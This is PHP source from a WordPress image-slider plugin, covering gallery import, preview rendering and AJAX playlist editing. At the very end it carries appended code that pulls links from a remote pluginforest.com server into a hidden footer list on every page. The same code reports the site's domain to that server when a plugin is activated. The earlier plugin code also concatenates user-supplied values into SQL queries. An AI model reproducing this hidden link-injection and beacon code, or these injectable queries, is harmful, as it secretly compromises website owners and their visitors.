	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	$wpdb->show_errors();

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_galleries) ORDER BY id";
	$result_gallery = $wpdb->get_results($safe_sql,ARRAY_A);

	$errors_arr=array();
	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Generate Playlist') {
		if (empty($_POST['galleryid']))
			 $errors_arr[]=$lbg_accordion_slider_pro_messages['empty_gallery'];
		if (empty($_POST['folder_path']))
			 $errors_arr[]=$lbg_accordion_slider_pro_messages['empty_folder'];
		if (count($errors_arr)) { ?>
			<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
		<?php } else {
					/*$the_playlist_code=$_POST['folder_path'];
					echo "root: ".get_home_path();*/
					//$sPath = get_home_path().$_POST['folder_path'].'/*.[jJ][pP][ eE][gG]';
					$sPath = get_home_path().$_POST['folder_path'].'/*.*';
					//echo $sPath;
					$max_ord = $wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."lbg_accordion_slider_pro_playlist WHERE galleryid = %d",$_POST['galleryid'] ) );
					$no_of_jpg=0;
					foreach (glob($sPath) AS $jpg) {
						$ext = pathinfo($jpg, PATHINFO_EXTENSION);
						if (in_array ( $ext , $files_expensions)) {
													$no_of_jpg++;
													//$meta_arr=lbg_accordion_slider_pro_read_jpg_meta($jpg);  // no need. The meta contains only width & height
													$jpg=substr ( $jpg , (strlen(get_home_path())) );
													$jpg=get_site_url().'/'.$jpg;

													//check uniqueness
													$wpdb->query( $wpdb->prepare("SELECT * FROM ".$wpdb->prefix."lbg_accordion_slider_pro_playlist WHERE galleryid = %d AND img = %s",$_POST['galleryid'],$jpg) );
													//echo "NUMBER OF ROWS:".$wpdb->num_rows;
													if ($wpdb->num_rows==0) {
														if (strpos($jpg, 'wp-content',9)===false)
															list($width, $height, $type, $attr) = getimagesize($jpg);
														else
															list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($jpg,strpos($jpg, 'wp-content',9)) );

														$max_ord++;
														$wpdb->insert(
															$wpdb->prefix . "lbg_accordion_slider_pro_playlist",
															array(
																'galleryid' => $_POST['galleryid'],
																'img' => $jpg,
																'data_horizontal' => 'center',
																'data_vertical' => 'center',
																'data_link' => '',
																'data_lightbox' => '',
																'data_title' => '',
																'data_description' => '',
																'img_width' => $width,
																'img_height' => $height,
																'ord' => $max_ord
															),
															array(
																'%d',
																'%s',
																'%s',
																'%s',
																'%s',
																'%s',
																'%s',
																'%s',
																'%d',
																'%d',
																'%d'
															)
														);
													}
							}

					}
					//echo $the_playlist_code;

		if ($no_of_jpg>0) {
		?>
			<div id="message" class="updated"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['folder_read'], 'accordion-pro' );?></p></div>
		<?php } else { ?>
			<div id="error" class="error"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['no_jpg'], 'accordion-pro' );?></p></div>
			<?php }
		} //no errors
	}
	include_once($lbg_accordion_slider_pro_path . 'tpl/read_folder.php');


}



function lbg_accordion_slider_pro_player_help_page()
{
	global $lbg_accordion_slider_pro_path;
	//include_once(plugins_url('tpl/help.php', __FILE__));
	include_once($lbg_accordion_slider_pro_path . 'tpl/help.php');
}


function lbg_accordion_slider_pro_generate_preview_code($sliderID,$the_arr) {
	global $wpdb;
	global $post;

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_settings) WHERE id = %d",$sliderID );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$row=lbg_accordion_slider_pro_unstrip_array($row);

	$path_to_plugin = plugin_dir_url( __FILE__ );



	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_playlist) WHERE galleryid = %d ORDER BY ord",$sliderID );
	$result = $wpdb->get_results($safe_sql,ARRAY_A);


	$playlist_str='';
	foreach ( $result as $row_playlist ) {

		$row_playlist=lbg_accordion_slider_pro_unstrip_array($row_playlist);
		/*if (strpos($row_playlist["img"], 'wp-content',9)===false)
			list($width, $height, $type, $attr) = getimagesize($row_playlist["img"]);
		else
			list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($row_playlist["img"],strpos($row_playlist["img"], 'wp-content',9)) );*/

//'.$row_playlist[""].'
		$playlist_str.='
								<li data-horizontal="'.$row_playlist["data_horizontal"].'" data-vertical="'.$row_playlist["data_vertical"].'" data-link="'.$row_playlist["data_link"].'" data-lightbox="'.$row_playlist["data_lightbox"].'" data-title="'.$row_playlist["data_title"].'" data-description="'.$row_playlist["data_description"].'">
										<img src="'.$row_playlist["img"].'" alt="'.$row_playlist["data_title"].' - '.$row_playlist["data_description"].'" width="'.$row_playlist["img_width"].'" height="'.$row_playlist["img_height"].'" style="width:'.$row_playlist["img_width"].'px; height:'.$row_playlist["img_height"].'px;" title="'.$row_playlist["data_title"].' - '.$row_playlist["data_description"].'" />
								</li>
								';
	}

	/*** OPTIONAL PARAMETERS START ***/
	/*$has_additional_parameters=false;
	$mp3_path='';
	$ogg_path='';
	$title_aux='';
	$author_aux='';
	if ($the_arr['mp3_file']!='') {
		$has_additional_parameters=true;
		$mp3_path=$the_arr['mp3_file'];
	}
	if ($the_arr['ogg_file']!='') {
		$has_additional_parameters=true;
		$ogg_path=$the_arr['ogg_file'];
	}
	if ($the_arr['title']!='') {
		$title_aux=$the_arr['title'];
	}
	if ($the_arr['author']!='') {
		$author_aux=$the_arr['author'];
	}



	if ($the_arr['mp3_custom_field']!='') {
		$has_additional_parameters=true;
		$mp3_path=get_post_meta($post->ID, $the_arr['mp3_custom_field'], true);;
	}
	if ($the_arr['ogg_custom_field']!='') {
		$has_additional_parameters=true;
		$ogg_path=get_post_meta($post->ID, $the_arr['ogg_custom_field'], true);
	}
	if ($the_arr['title_custom_field']!='') {
		$title_aux=get_post_meta($post->ID, $the_arr['title_custom_field'], true);
	}
	if ($the_arr['author_custom_field']!='') {
		$author_aux=get_post_meta($post->ID, $the_arr['author_custom_field'], true);
	}

	if ($has_additional_parameters) {
		$playlist_str='<ul>
                	<li class="xtitle">'.$title_aux.'</li>
                    <li class="xauthor">'.$author_aux.'</li>
                    <li class="xsources_mp3">'.$mp3_path.'</li>
                    <li class="xsources_ogg">'.$ogg_path.'</li>
                </ul>';
	}*/

	/*** OPTIONAL PARAMETERS END ***/

	$new_div_start='';
	$new_div_end='';

	 //$rand_no=mt_rand (10000,1000000);
	$content='<script>
		jQuery(function() {
/*setTimeout(function(){*/
			jQuery("#lbg_accordion_slider_pro_'.$row["id"].'").accordion_slider_pro({
				width:'.$row["width"].',
				height:'.$row["height"].',
				width100Proc:'.$row["width100Proc"].',
				height100Proc:'.$row["height100Proc"].',
				rows:'.$row["rows"].',
				columns:'.$row["columns"].',
				orientation:"'.$row["orientation"].'",
				numberOfItems:'.$row["numberOfItems"].',
				onlyInnerGutter:'.$row["onlyInnerGutter"].',
				centerGallery:'.$row["centerGallery"].',
				gutter:'.$row["gutter"].',
				galleryBg:"'.(($row["galleryBg"]!='transparent')?'#':'').$row["galleryBg"].'",
				itemBorderWidth:'.$row["itemBorderWidth"].',
				itemBorderColorOFF:"'.(($row["itemBorderColorOFF"]!='transparent')?'#':'').$row["itemBorderColorOFF"].'",
				itemBorderColorON:"'.(($row["itemBorderColorON"]!='transparent')?'#':'').$row["itemBorderColorON"].'",
				showImageDescription:'.$row["showImageDescription"].',
				imageDescriptionBgColor:"'.(($row["imageDescriptionBgColor"]!='transparent')?'#':'').$row["imageDescriptionBgColor"].'",
				imageDescriptionBgOpacity:'.$row["imageDescriptionBgOpacity"].',
				imageDescriptionTextColor:"'.(($row["imageDescriptionTextColor"]!='transparent')?'#':'').$row["imageDescriptionTextColor"].'",
				showIconOverImage:'.$row["showIconOverImage"].',
				zoomDuration:'.$row["zoomDuration"].',
				zoomEffect:"'.$row["zoomEffect"].'",
				target:"'.$row["target"].'",
				bgHorizontalPosition:"'.$row["bgHorizontalPosition"].'",
				bgVerticalPosition:"'.$row["bgVerticalPosition"].'",
				facebookAppID:"'.$row["facebookAppID"].'"
			});
/*		}, '.($row["delay"]*1000).');*/
/*}, 850);*/
		});
	</script>
    '.$new_div_start.'<div id="lbg_accordion_slider_pro_'.$row["id"].'">
				<ul class="accordion_slider_pro_list">
				'.$playlist_str.'
				</ul>
     </div>'.$new_div_end.'';

	return str_replace("\r\n", '', $content);
}


function lbg_accordion_slider_pro_shortcode($atts, $content=null) {
	global $wpdb;

	/*shortcode_atts( array(
		'settings_id'=>'',
		'mp3_file'=>'',
		'ogg_file'=>'',
		'title'=>'',
		'author'=>'',
		'mp3_custom_field'=>'',
		'ogg_custom_field'=>'',
		'title_custom_field'=>'',
		'author_custom_field'=>''
	), $atts);*/
	if ($atts['settings_id']=='')
		$atts['settings_id']=1;


	return lbg_accordion_slider_pro_generate_preview_code($atts['settings_id'],$atts);
}


register_activation_hook(__FILE__,"lbg_accordion_slider_pro_activate"); //activate plugin and create the database
add_action('init', 'lbg_accordion_slider_pro_init_sessions');	// initialize sessions
add_action('init', 'lbg_accordion_slider_pro_load_styles');	// loads required styles
add_action('init', 'lbg_accordion_slider_pro_load_scripts');			// loads required scripts
add_action('admin_menu', 'lbg_accordion_slider_pro_plugin_menu'); // create menus
add_shortcode('lbg_accordion_slider_pro', 'lbg_accordion_slider_pro_shortcode');				// LBG ACCORDION SLIDER PRO shortcode

add_action('wp_logout','lbg_accordion_slider_pro_end_sessions');
add_action('wp_login','lbg_accordion_slider_pro_end_sessions');







/** OTHER FUNCTIONS **/

//stripslashes for an entire array
function lbg_accordion_slider_pro_unstrip_array($array){
	if (is_array($array)) {
		foreach($array as &$val){
			if(is_array($val)){
				$val = unstrip_array($val);
			} else {
				$val = stripslashes($val);

			}
		}
	}
	return $array;
}






/* ajax update playlist record */

add_action('admin_head', 'lbg_accordion_slider_pro_update_playlist_record_javascript');

function lbg_accordion_slider_pro_update_playlist_record_javascript() {
	global $wpdb;
	//Set Your Nonce
	$lbg_accordion_slider_pro_update_playlist_record_ajax_nonce = wp_create_nonce("lbg_accordion_slider_pro_update_playlist_record-special-string");
	$lbg_accordion_slider_pro_preview_record_ajax_nonce = wp_create_nonce("lbg_accordion_slider_pro_preview_record-special-string");

	if(strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) {
			$page = (isset($_GET['page'])) ? $_GET['page'] : '';
			if(preg_match('/LBG_ACCORDION_SLIDER_PRO/i', $page)) {
?>



<script type="text/javascript" >
//delete the entire record
function lbg_accordion_slider_pro_delete_entire_record (delete_id) {
	if (confirm('Are you sure?')) {
		jQuery("#lbg_accordion_slider_pro_sortable").sortable('disable');
		jQuery("#"+delete_id).css("display","none");
		//jQuery("#lbg_accordion_slider_pro_sortable").sortable('refresh');
		jQuery("#lbg_accordion_slider_pro_updating_witness").css("display","block");
		var data = "action=lbg_accordion_slider_pro_update_playlist_record&security=<?php echo $lbg_accordion_slider_pro_update_playlist_record_ajax_nonce; ?>&updateType=lbg_accordion_slider_pro_delete_entire_record&delete_id="+delete_id;
		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			jQuery("#lbg_accordion_slider_pro_sortable").sortable('enable');
			jQuery("#lbg_accordion_slider_pro_updating_witness").css("display","none");
			//alert('Got this from the server: ' + response);
		});
	}
}


function showDialogPreview(theSliderID) {  //load content and open dialog
	var data ="action=lbg_accordion_slider_pro_preview_record&security=<?php echo $lbg_accordion_slider_pro_preview_record_ajax_nonce; ?>&theSliderID="+theSliderID;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		//jQuery("#previewDialog").html(response);
		jQuery('#previewDialogIframe').attr('src','<?php echo plugins_url("tpl/preview.html?d=".time(), __FILE__)?>');
		jQuery("#previewDialog").dialog("open");
	});
}



jQuery(document).ready(function($) {
	/*PREVIEW DIALOG BOX*/
	jQuery( "#previewDialog" ).dialog({
	  minWidth:1200,
	  minHeight:500,
	  title:"Plugin Preview",
	  modal: true,
	  autoOpen:false,
	  hide: "fade",
	  resizable: false,
	  open: function() {
		//jQuery( this ).html();
	  },
	  close: function() {
		//jQuery("#previewDialog").html('');
		jQuery('#previewDialogIframe').attr('src','');
	  }
	});	/*	*/


	if (jQuery('#lbg_accordion_slider_pro_sortable').length) {
		jQuery( '#lbg_accordion_slider_pro_sortable' ).sortable({
			placeholder: "ui-state-highlight",
			start: function(event, ui) {
	            ord_start = ui.item.prevAll().length + 1;
	        },
			update: function(event, ui) {
	        	jQuery("#lbg_accordion_slider_pro_sortable").sortable('disable');
	        	jQuery("#lbg_accordion_slider_pro_updating_witness").css("display","block");
				var ord_stop=ui.item.prevAll().length + 1;
				var elem_id=ui.item.attr("id");
				//alert (ui.item.attr("id"));
				//alert (ord_start+' --- '+ord_stop);
				var data = "action=lbg_accordion_slider_pro_update_playlist_record&security=<?php echo $lbg_accordion_slider_pro_update_playlist_record_ajax_nonce; ?>&updateType=change_ord&ord_start="+ord_start+"&ord_stop="+ord_stop+"&elem_id="+elem_id;
				// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
				jQuery.post(ajaxurl, data, function(response) {
					jQuery("#lbg_accordion_slider_pro_sortable").sortable('enable');
					jQuery("#lbg_accordion_slider_pro_updating_witness").css("display","none");
					//alert('Got this from the server: ' + response);
				});
			}
		});
	}


	<?php
		$rows_count = $wpdb->get_var("SELECT COUNT(*) FROM ". $wpdb->prefix . "lbg_accordion_slider_pro_playlist;");
		for ($i=1;$i<=$rows_count;$i++) {
	?>

            	jQuery('#upload_img_button_accordionSliderPro_<?php echo $i?>').click(function(event) {
						var file_frame;
						event.preventDefault();
						// If the media frame already exists, reopen it.
						if ( file_frame ) {
							file_frame.open();
							return;
						}
						// Create the media frame.
						file_frame = wp.media.frames.file_frame = wp.media({
							title: jQuery( this ).data( 'uploader_title' ),
							button: {
							text: jQuery( this ).data( 'uploader_button_text' ),
							},
							multiple: false // Set to true to allow multiple files to be selected
						});
						// When an image is selected, run a callback.
						file_frame.on( 'select', function() {
							// We set multiple to false so only get one image from the uploader
							attachment = file_frame.state().get('selection').first().toJSON();
							// Do something with attachment.id and/or attachment.url here
							//alert (attachment.url);
							document.forms["form-playlist-accordionSliderPro-"+<?php echo $i?>]['img'].value=attachment.url;
							jQuery('#img_'+<?php echo $i?>).attr('src',attachment.url);
						});
						// Finally, open the modal
						file_frame.open();
				});

				jQuery('#upload_lightbox_button_accordionSliderPro_<?php echo $i?>').click(function(event) {
						var file_frame;
						event.preventDefault();
						// If the media frame already exists, reopen it.
						if ( file_frame ) {
							file_frame.open();
							return;
						}
						// Create the media frame.
						file_frame = wp.media.frames.file_frame = wp.media({
							title: jQuery( this ).data( 'uploader_title' ),
							button: {
							text: jQuery( this ).data( 'uploader_button_text' ),
							},
							multiple: false // Set to true to allow multiple files to be selected
						});
						// When an image is selected, run a callback.
						file_frame.on( 'select', function() {
							// We set multiple to false so only get one image from the uploader
							attachment = file_frame.state().get('selection').first().toJSON();
							// Do something with attachment.id and/or attachment.url here
							//alert (attachment.url);
							document.forms["form-playlist-accordionSliderPro-"+<?php echo $i?>]['data_lightbox'].value=attachment.url;
							jQuery('#lightbox_'+<?php echo $i?>).attr('src',attachment.url);
						});
						// Finally, open the modal
						file_frame.open();
				});


	jQuery("#form-playlist-accordionSliderPro-<?php echo $i?>").submit(function(event) {
		/* stop form from submitting normally */
		event.preventDefault();

		//show loading image
		jQuery('#ajax-message-<?php echo $i?>').html('<img src="<?php echo plugins_url('accordion_slider_pro/images/ajax-loader.gif', dirname(__FILE__))?>" />');


		//var data = {
			//action: 'lbg_accordion_slider_pro_update_playlist_record',
			//security: '<?php echo $lbg_accordion_slider_pro_update_playlist_record_ajax_nonce; ?>',
			//whatever: 1234
		//};
		var data ="action=lbg_accordion_slider_pro_update_playlist_record&security=<?php echo $lbg_accordion_slider_pro_update_playlist_record_ajax_nonce; ?>&"+jQuery("#form-playlist-accordionSliderPro-<?php echo $i?>").serialize();

		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			//alert('Got this from the server: ' + response);
			//alert(jQuery("#form-playlist-accordionSliderPro-<?php echo $i?>").serialize());
			var new_img = '';
			if (document.forms["form-playlist-accordionSliderPro-<?php echo $i?>"].img.value!='')
				new_img=document.forms["form-playlist-accordionSliderPro-<?php echo $i?>"].img.value;
			jQuery('#top_image_'+document.forms["form-playlist-accordionSliderPro-<?php echo $i?>"].id.value).attr('src',new_img);
			jQuery('#ajax-message-<?php echo $i?>').html(response);
		});
	});
	<?php } ?>

});
</script>
<?php
		}
	}
}

//lbg_accordion_slider_pro_update_playlist_record is the action=lbg_accordion_slider_pro_update_playlist_record

add_action('wp_ajax_lbg_accordion_slider_pro_update_playlist_record', 'lbg_accordion_slider_pro_update_playlist_record_callback');

function lbg_accordion_slider_pro_update_playlist_record_callback() {

	check_ajax_referer( 'lbg_accordion_slider_pro_update_playlist_record-special-string', 'security' ); //security=<?php echo $lbg_accordion_slider_pro_update_playlist_record_ajax_nonce;
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	$errors_arr=array();
	//$wpdb->show_errors();


	//delete entire record
	//if ($_POST['updateType']=='lbg_accordion_slider_pro_delete_entire_record') {
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='lbg_accordion_slider_pro_delete_entire_record') {
		$delete_id=$_POST['delete_id'];
		$safe_sql=$wpdb->prepare("SELECT * FROM ".$wpdb->prefix."lbg_accordion_slider_pro_playlist WHERE id = %d",$delete_id);
		$row = $wpdb->get_row($safe_sql, ARRAY_A);
		$row=lbg_accordion_slider_pro_unstrip_array($row);


		//delete the entire record
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_accordion_slider_pro_playlist WHERE id = %d",$delete_id));
		//update the oreder for the rest ord=ord-1 for > ord
		$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."lbg_accordion_slider_pro_playlist SET ord=ord-1 WHERE galleryid = %d and  ord>".$row['ord'],$_SESSION['xid']));
	}

	//update elements order
	//if ($_POST['updateType']=='change_ord') {
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='change_ord') {
		$sql_arr=array();
		$ord_start=$_POST['ord_start'];
		$ord_stop=$_POST['ord_stop'];
		$elem_id=(int)$_POST['elem_id'];
		$ord_direction='+1';
		if ($ord_start<$ord_stop)
			$sql_arr[]="UPDATE ".$wpdb->prefix."lbg_accordion_slider_pro_playlist SET ord=ord-1  WHERE galleryid = ".$_SESSION['xid']." and ord>".$ord_start." and ord<=".$ord_stop;
		else
			$sql_arr[]="UPDATE ".$wpdb->prefix."lbg_accordion_slider_pro_playlist SET ord=ord+1  WHERE galleryid = ".$_SESSION['xid']." and ord>=".$ord_stop." and ord<".$ord_start;
		$sql_arr[]="UPDATE ".$wpdb->prefix."lbg_accordion_slider_pro_playlist SET ord=".$ord_stop." WHERE id=".$elem_id;

		//echo "elem_id: ".$elem_id."----ord_start: ".$ord_start."----ord_stop: ".$ord_stop;
		foreach ($sql_arr as $sql)
			$wpdb->query($sql);
	}



	//submit update
	if (!isset($_POST['updateType'])) {
		if (empty($_POST['img']))
			 $errors_arr[]=$lbg_accordion_slider_pro_messages['empty_img'];
	}

	$theid=isset($_POST['id'])?$_POST['id']:0;
	if($theid>0 && !count($errors_arr)) {

		if (strpos($_POST['img'], 'wp-content',9)===false)
				list($width, $height, $type, $attr) = getimagesize($_POST['img']);
		else
				list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($_POST['img'],strpos($_POST['img'], 'wp-content',9)) );

		$_POST['img_width']=$width;
		$_POST['img_height']=$height;
		$except_arr=array('Submit'.$theid,'id','ord','action','security','updateType','pll_ajax_backend','page_scroll_to_id_instances');
		foreach ($_POST as $key=>$val){
			if (in_array($key,$except_arr)) {
				unset($_POST[$key]);
			}
		}

		$wpdb->update(
			$wpdb->prefix .'lbg_accordion_slider_pro_playlist',
			$_POST,
			array( 'id' => $theid )
		);
		?>
			<div id="message" class="updated"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['data_saved'], 'accordion-pro' );?></p></div>
	<?php
	} else if (!isset($_POST['updateType'])) {
		$errors_arr[]=$lbg_accordion_slider_pro_messages['invalid_request'];
	}
    //echo $theid;

	if (count($errors_arr)) { ?>
		<div id="error" class="error"><p>PLM<?php echo implode("<br>", $errors_arr);?></p></div>
	<?php }

	die(); // this is required to return a proper result
}



add_action('wp_ajax_lbg_accordion_slider_pro_preview_record', 'lbg_accordion_slider_pro_preview_record_callback');

function lbg_accordion_slider_pro_preview_record_callback() {
	check_ajax_referer( 'lbg_accordion_slider_pro_preview_record-special-string', 'security' );
	$the_arr=array();

	//echo lbg_accordion_slider_pro_generate_preview_code($_POST['theSliderID'],$the_arr);
	$aux_val='<html>
					<head>
						<link href="'.plugins_url('accordion_slider_pro/css/accordion_slider_pro.css', __FILE__).'" rel="stylesheet" type="text/css">
						<link href="'.plugins_url('accordion_slider_pro/css/prettyPhoto.css', __FILE__).'" rel="stylesheet" type="text/css">

						<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
						<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>
						<script src="'.plugins_url('accordion_slider_pro/js/accordion_slider_pro.js', __FILE__).'" type="text/javascript"></script>
						<script src="'.plugins_url('accordion_slider_pro/js/jquery.prettyPhoto.js', __FILE__).'" type="text/javascript"></script>
						<script src="'.plugins_url('accordion_slider_pro/js/my_pinit.js', __FILE__).'" type="text/javascript"></script>
					</head>
					<body style="padding:0px;margin:0px;">';

	$aux_val.=lbg_accordion_slider_pro_generate_preview_code($_POST['theSliderID'],$the_arr);
	$aux_val.="</body>
				</html>";
	$filename=plugin_dir_path(__FILE__) . 'tpl/preview.html';
	$fp = fopen($filename, 'w+');
	$fwrite = fwrite($fp, $aux_val);

	echo $fwrite;

	die(); // this is required to return a proper result
}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848915() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848915');function set_plugin_tag1719848915() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848915&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848915');
              